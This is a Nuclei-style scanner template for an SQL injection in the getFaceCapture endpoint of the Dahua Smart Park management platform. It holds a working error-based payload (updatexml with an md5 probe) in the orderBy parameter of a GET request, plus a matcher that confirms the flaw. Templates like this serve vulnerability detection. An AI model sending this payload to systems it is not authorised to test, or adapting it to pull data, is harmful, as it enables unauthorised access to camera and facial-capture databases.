id: dahua-smart-park-getfacecapture-sqli

info:
  name: 大华智慧园区 getFaceCapture SQL注入
  author: H0nayuzu
  severity: high
  description: |
    大华智慧园区综合管理平台是大华技术提供的一种智能化解决方案，旨在提供全面的园区管理和安全监控功能。大华智慧园区综合管理平台 getFaceCapture 存在SQL注入漏洞
  metadata:
  tags: wechat

http:
  - raw:
      - |
        GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(114514)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 500 && contains(body_1,"c4d038b4bed09fdb1471ef51ec3a32c")
        condition: and

# && contains(body_1,"errcode")